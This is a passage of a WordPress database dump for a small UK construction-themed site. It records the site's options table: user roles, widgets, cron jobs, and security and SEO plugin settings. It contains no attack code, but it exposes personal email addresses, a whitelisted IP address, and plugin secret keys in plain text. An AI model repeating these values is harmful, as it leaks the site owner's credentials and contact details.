pc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','construction-hub','yes'),(41,'stylesheet','property-builder','yes'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','49752','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','posts','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:3:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;i:3;a:3:{s:5:\"title\";s:17:\"Recommended Sites\";s:4:\"text\";s:778:\"<table width=\"241\">\r\n<tbody>\r\n<tr>\r\n<td width=\"241\"><a href=\"http://beyondprofit.org.uk/\">beyondprofit.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://beston.co.uk/\">beston.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://purpay.co.uk/\">purpay.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://aegispolicies.co.uk/\">aegispolicies.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://bruceco.co.uk/\">bruceco.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://investment-direct.co.uk/\">investment-direct.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://fctp.co.uk/\">fctp.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://sunalliance.co.uk/\">sunalliance.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://insuranceclaim.me.uk/\">insuranceclaim.me.uk</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\";s:6:\"filter\";b:0;}}','yes'),(80,'widget_rss','a:3:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(81,'uninstall_plugins','a:5:{s:29:\"spam-captcha/spam-captcha.php\";a:2:{i:0;s:12:\"spam_captcha\";i:1;s:20:\"uninstall_removedata\";}s:33:\"import-html-pages/html-import.php\";s:26:\"html_import_remove_options\";s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";s:27:\"redirection/redirection.php\";a:2:{i:0;s:17:\"Redirection_Admin\";i:1;s:16:\"plugin_uninstall\";}s:25:\"sucuri-scanner/sucuri.php\";s:19:\"sucuriscanUninstall\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','0','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:65:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:35:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:3:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(95,'widget_recent-posts','a:3:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:3:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:10:{s:19:\"wp_inactive_widgets\";a:0:{}s:18:\"dw_megamenu_widget\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:15:\"sidebar-primary\";a:0:{}s:18:\"footer-widget-area\";a:0:{}s:13:\"array_version\";i:3;s:23:\"city_store_main_sidebar\";a:2:{i:0;s:10:\"calendar-3\";i:1;s:7:\"pages-3\";}s:19:\"city_store_footer_1\";a:1:{i:0;s:14:\"recent-posts-4\";}s:19:\"city_store_footer_2\";a:1:{i:0;s:10:\"archives-4\";}s:19:\"city_store_footer_3\";a:1:{i:0;s:6:\"text-3\";}s:19:\"city_store_footer_4\";a:2:{i:0;s:5:\"rss-3\";i:1;s:8:\"search-4\";}}','yes'),(100,'widget_pages','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(101,'widget_calendar','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(102,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'cron','a:20:{i:1675209428;a:1:{s:18:\"cerber_bg_launcher\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:8:\"crb_five\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1675209600;a:1:{s:15:\"cerber_hourly_1\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675210200;a:1:{s:15:\"cerber_hourly_2\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675211568;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675212028;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675212661;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675218000;a:1:{s:12:\"cerber_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675232148;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675236853;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675240811;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1675240987;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675246183;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675246207;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675246216;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675249819;a:1:{s:13:\"sm_ping_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675254144;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675255386;a:1:{s:25:\"sucuriscan_scheduled_scan\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675255416;a:1:{s:22:\"redirection_log_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675270225;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(105,'theme_mods_twentyseventeen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1494324843;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(130,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:32:\"amber.platts@vanillacircus.co.uk\";s:7:\"version\";s:5:\"5.8.6\";s:9:\"timestamp\";i:1666088027;}','no'),(139,'recently_activated','a:0:{}','yes'),(141,'aiowpsec_db_version','1.9','yes'),(142,'aio_wp_security_configs','a:95:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:1:\"1\";s:28:\"aiowps_allow_unlock_requests\";s:1:\"1\";s:25:\"aiowps_max_login_attempts\";i:3;s:24:\"aiowps_retry_time_period\";i:5;s:26:\"aiowps_lockout_time_length\";i:60;s:28:\"aiowps_set_generic_login_msg\";s:1:\"1\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:1:\"1\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"csbfndjtzioaqmab5kcn\";s:26:\"aiowps_enable_whitelisting\";s:1:\"1\";s:27:\"aiowps_allowed_ip_addresses\";s:14:\"217.206.184.92\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"vu9vbcx61wuxlgqgj0x9\";s:42:\"aiowps_enable_manual_registration_approval\";s:1:\"1\";s:39:\"aiowps_enable_registration_page_captcha\";s:1:\"1\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_disable_file_editing\";s:1:\"1\";s:37:\"aiowps_prevent_default_wp_file_access\";s:1:\"1\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:1:\"1\";s:31:\"aiowps_enable_pingback_firewall\";s:1:\"1\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:1:\"1\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:1:\"1\";s:25:\"aiowps_enable_6g_firewall\";s:1:\"1\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:1:\"1\";s:29:\"aiowps_enable_comment_captcha\";s:1:\"1\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:1:\"1\";s:25:\"aiowps_fcd_scan_frequency\";i:1;s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:1:\"1\";s:29:\"aiowps_fcd_scan_email_address\";s:23:\"bensykes@bensykes.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:1;s:22:\"aiowps_copy_protection\";s:1:\"1\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:28:\"aiowps_block_fake_googlebots\";s:1:\"1\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:1:\"1\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";i:10;s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";s:19:\"aiowps_fcd_filename\";s:26:\"aiowps_fcd_data_hzbokb4sly\";s:25:\"aiowps_last_fcd_scan_time\";s:19:\"2023-01-25 10:58:43\";}','yes'),(144,'sm_rewrite_done','$Id: sitemap-loader.php 937300 2014-06-23 18:04:11Z arnee $','yes'),(145,'loginlockdownAdminOptions','a:6:{s:17:\"max_login_retries\";i:3;s:14:\"retries_within\";i:5;s:14:\"lockout_length\";i:60;s:25:\"lockout_invalid_usernames\";s:2:\"no\";s:17:\"mask_login_errors\";s:2:\"no\";s:16:\"show_credit_link\";s:3:\"yes\";}','yes'),(146,'loginlockdown_db_version','1.0','no'),(148,'spam_captcha_options','a:6:{s:12:\"contactform7\";b:0;s:16:\"hash_sha1_plugin\";s:40:\"ccb524225ee208fba3b2bc7cf7be90296d1bb965\";s:11:\"captcha_css\";s:43:\".captcha_image {\n	\n}\n.captcha_comment {\n	\n}\";s:14:\"captcha_enable\";b:0;s:14:\"flush_nb_jours\";i:30;s:15:\"flush_max_entry\";i:10000;}','yes'),(149,'plugin_error_on_activation','','yes'),(151,'wpmdr_css','/* Remove meta from post */\r\n.entry-meta {\r\ndisplay:none !important;\r\n}\r\n\r\n/* Remove meta from home page */\r\n.home .entry-meta { \r\ndisplay: none; \r\n}\r\n/* WPTheme 2015 Metadata Removal */\r\n.entry-footer {\r\ndisplay:none !important;\r\n}\r\n\r\n/* WPTheme 2015 Metadata Removal */\r\n.home .entry-footer { \r\ndisplay: none; \r\n}','yes'),(152,'wpmdr_disable_php','0','yes'),(153,'wpmdr_disable_css','0','yes'),(154,'wpseo','a:24:{s:14:\"blocking_files\";a:0:{}s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:3:\"4.7\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:0:\"\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:12:\"website_name\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";b:0;s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:20:\"enable_setting_pages\";b:0;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1494324618;}','yes'),(155,'wpseo_permalinks','a:9:{s:15:\"cleanpermalinks\";b:0;s:24:\"cleanpermalink-extravars\";s:0:\"\";s:29:\"cleanpermalink-googlecampaign\";b:0;s:31:\"cleanpermalink-googlesitesearch\";b:0;s:15:\"cleanreplytocom\";b:0;s:10:\"cleanslugs\";b:1;s:18:\"redirectattachment\";b:0;s:17:\"stripcategorybase\";b:0;s:13:\"trailingslash\";b:0;}','yes'),(156,'wpseo_titles','a:54:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:5:\"noodp\";b:0;s:15:\"usemetakeywords\";b:0;s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:18:\"metakey-home-wpseo\";s:0:\"\";s:20:\"metakey-author-wpseo\";s:0:\"\";s:22:\"noindex-subpages-wpseo\";b:0;s:20:\"noindex-author-wpseo\";b:0;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"metakey-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:16:\"hideeditbox-post\";b:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"metakey-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:16:\"hideeditbox-page\";b:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"metakey-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:22:\"hideeditbox-attachment\";b:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:20:\"metakey-tax-category\";s:0:\"\";s:24:\"hideeditbox-tax-category\";b:0;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:20:\"metakey-tax-post_tag\";s:0:\"\";s:24:\"hideeditbox-tax-post_tag\";b:0;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:23:\"metakey-tax-post_format\";s:0:\"\";s:27:\"hideeditbox-tax-post_format\";b:0;s:23:\"noindex-tax-post_format\";b:1;}','yes'),(157,'wpseo_social','a:20:{s:9:\"fb_admins\";a:0:{}s:12:\"fbconnectkey\";s:32:\"f5e3591bc5950ccc51bc8bc93925e831\";s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(158,'wpseo_rss','a:2:{s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";}','yes'),(159,'wpseo_internallinks','a:10:{s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not 